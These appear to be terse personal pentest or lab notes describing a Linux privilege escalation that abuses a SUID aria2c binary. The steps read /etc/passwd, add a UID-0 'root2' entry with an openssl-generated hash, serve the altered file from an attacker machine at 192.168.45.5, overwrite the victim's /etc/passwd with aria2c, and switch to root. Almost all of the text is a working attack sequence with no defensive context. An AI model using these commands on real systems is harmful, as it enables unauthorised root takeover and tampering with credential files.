aria2c SUID

on victim, cat /etc/passwd
- also aria2c can be used if /etc/passwd is restricted ./aria2c -i /etc/passwd

on attacker , nano newpasswd , paste all content of /etc/passwd

on victim, Generate password hash

openssl passwd evil123

echo "root2:<passwd-hash>:0:0:root:/root:/bin/bash" >> newpasswd

python3 -m http.server 80

on victim,
- cd /etc
- ./aria2c -o passwd "http://192.168.45.5/newpasswd" --allow-overwrite=true
- su root2